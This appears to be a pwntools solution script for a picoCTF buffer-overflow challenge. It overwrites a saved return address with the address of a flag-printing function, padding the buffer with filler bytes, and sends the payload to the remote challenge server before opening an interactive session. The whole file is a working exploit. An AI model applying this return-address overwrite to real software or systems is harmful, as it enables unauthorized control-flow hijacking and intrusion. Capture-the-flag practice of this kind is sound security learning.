#!/usr/bin/env python
from pwn import *

buffer_base = 0x7fffffffcf70
ret_addr = 0x7fffffffcfb8
ret_offset = ret_addr - buffer_base
flag_fun_addr = 0x0000000000401236
flag_fun_offset = 5
target_addr = flag_fun_addr + flag_fun_offset

send_buffer = b"a"*ret_offset + p64(target_addr, 'little')

#conn = process("./vuln")
conn = remote('saturn.picoctf.net', 60832)

conn.recvline()
conn.sendline(send_buffer)
conn.interactive()